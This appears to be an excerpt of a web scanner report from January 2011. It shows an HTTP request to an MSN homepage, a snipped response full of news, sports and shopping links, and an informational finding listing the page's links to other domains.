http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA40
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 45556
Content-Length: 45556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNHPT">Saturday, January 29, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41327694/ns/us_news/?GT1=43001"><img src="http://col.stb.s-msn.com/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg" title="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" width="206" height="144" alt="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" /></a>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001"><img src="http://col.stb.s-msn.com/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg" title="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" width="206" height="144" alt="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002"><img src="http://col.stb.s-msn.com/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg" title="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" width="206" height="144" alt="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" /></a><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002">FBI helps with missing puck</a>
...[SNIP]...
<a href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001"><img src="http://col.stb.s-msn.com/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg" title="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" width="303" height="211" alt="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" /></a>
...[SNIP]...
<a href="http://dating.msn.com/en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000"><img src="http://col.stb.s-msn.com/i/62/47BC124184233113131B97F8F8359E.jpg" title="Image: Couple playing football (.. Jamie Grill/Getty Images)" width="293" height="144" alt="Image: Couple playing football (.. Jamie Grill/Getty Images)" /></a>
...[SNIP]...
<li style="width:293px;" class="last"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000"><img src="http://col.stb.s-msn.com/i/42/40224F9769E8AD5EA8F8A624E74A.jpg" title="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" width="293" height="144" alt="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" /></a><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000">Women: Find a guy who's just like you </a>
...[SNIP]...
<a href="http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017"><img src="http://col.stb.s-msn.com/i/40/6087ED1789141E9E7E7476F7D2A816.jpg" title="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" width="303" height="211" alt="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&GT1=35006"><img src="http://col.stb.s-msn.com/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg" title="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" width="303" height="211" alt="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" /></a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<a href="http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/6D/94835E23C59DA9988832DB01F.jpg" title="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" width="303" height="117" alt="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5"><img class="landscape" src="http://col.stb.s-msn.com/i/A4/C9F6DB1429C482320999B20976453.jpg" title=" Image: Man shredding paper (.. James Darell/Getty Images) " width="128" height="73" alt=" Image: Man shredding paper (.. James Darell/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/25/0E3EF1611A1E83275679938D78B0.jpg" title="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" width="128" height="73" alt="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010"><strong>
...[SNIP]...
<p>Bing: Mixing it up <a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010">on your own is easy</a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067"><img class="portrait" src="http://col.stb.s-msn.com/i/B7/CA0287F24D531F31B28EDED6FF651.jpg" title="Image: Accent pillows (.. redcover.com/Getty Images)" width="116" height="175" alt="Image: Accent pillows (.. redcover.com/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002"><img class="landscape" src="http://col.stb.s-msn.com/i/79/3D0CF24EE45332AEC818733145573.jpg" title="Image: Woman with curly hair style (Courtesy of Essence) " width="128" height="73" alt="Image: Woman with curly hair style (Courtesy of Essence)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/collegebasketball/scores"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG" width="303" height="117" alt="Image: Louisville Cardinals (Fred Beckham/AP)" /></a></div><div><a href="http://msn.foxsports.com/collegebasketball/scores">Live: Upsets abound in college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/leaderboard">How is Tiger Woods doing in 2011 season debut?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911">NBA star blames gas station stop for positive test</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911">Yankees boss to rival: Keep your team 'off welfare'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911">Report: Olympic swimming star making comeback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911">Suspensions handed down after NBA brawl</a><span class="piped"> | <a href="http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911">Pics</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911">Shaq in green adds twist to Lakers-Celtics rematch</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011">Where are top college football prospects headed?</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg" title="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" width="303" height="117" alt="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">'Hey, guess what! It's snowing!' </a>
...[SNIP]...
<p>A New Hampshire news crew hits the snowy streets to make sure the locals <a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">aren't fooled</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/1F/B5E89286961128824C7AE6885EC.jpg" title="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" width="128" height="73" alt="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007"><strong>
...[SNIP]...
<p>Go <a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007">behind the scenes</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg" title="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" width="128" height="73" alt="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007"><strong>
...[SNIP]...
<p>There's a <a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007">treat in store</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001"><img class="portrait" src="http://col.stb.s-msn.com/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg" title="Image: DiGiorno's pizza & cookies combo (Courtesy of Delish)" width="116" height="175" alt="Image: DiGiorno's pizza & cookies combo (Courtesy of Delish)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">Pizza & cookie dough: Gross or good?</a>
...[SNIP]...
<p>DiGiorno debuts what is either the <a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">tastiest or most tasteless</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg" title="Image: Boy on fence (.. Charlie Roy/Getty Images)" width="128" height="73" alt="Image: Boy on fence (.. Charlie Roy/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg" title="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" width="128" height="73" alt="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010"><strong>
...[SNIP]...
<p>A UK university has awarded one woman a <a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010">special degree</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON">37 steals & deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010"><img src="http://col.stb.s-msn.com/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg" title="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " width="75" height="128" alt="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010">Flirty dresses for Valentine's Day </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&gt1=36010">Popular NFL players' jerseys </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Cupcake+Stand&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&gt1=36010">Bake cute, tasty cupcakes at home </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&gt1=36010">Diets that take weight off </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&gt1=36010">Which hair loss remedies really work? </a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.430. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-redacted/i/3E/3E32A65A54765E9193E7946B7F64.jpg
http://col.stb.s-redacted/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg
http://col.stb.s-redacted/i/51/E28E2C88338D867AE51A2853768E.jpg
http://col.stb.s-redacted/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg
http://col.stb.s-redacted/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg
http://col.stb.s-redacted/i/69/38A7E111C7E3A98263F6658E7063D2.jpg
http://col.stb.s-redacted/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg
http://col.stb.s-redacted/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg
http://col.stb.s-redacted/i/80/EA261A55FB948339E67F47051B4F6.jpg
http://col.stb.s-redacted/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg
http://col.stb.s-redacted/i/90/FB7888CDDECEAEF33752C48C04286.jpg
http://col.stb.s-redacted/i/9F/2177C83925E3767FB9AC282991F22.jpg
http://col.stb.s-redacted/i/A2/2888962E701EAAE9359FF470864F30.jpg
http://col.stb.s-redacted/i/A5/79D26D4C8D9DA16339279967F5473.jpg
http://col.stb.s-redacted/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg
http://col.stb.s-redacted/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg
http://col.stb.s-redacted/i/BA/C029CA31B84EE7CFCB17C349435C.jpg
http://col.stb.s-redacted/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg
http://col.stb.s-redacted/i/CD/70685892D9EC978E450FF891858.jpg
http://col.stb.s-redacted/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg
http://col.stb.s-redacted/i/DF/749E3611476657BDEDA1876151B3D.jpg
http://col.stb.s-redacted/i/F8/81185586C353EC6EA7CB7985B625C.jpg
http://col.stb.s-redacted/i/FB/39B57119E113EAC72C86F212549.jpg
http://col.stc.s-redacted/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod
http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000
http://msn.foxsports.com/fantasy/football/big-game-challenge
http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002
http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002
http://msn.foxsports.com/nfl?GT1=39028
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010
http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON
http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000
http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
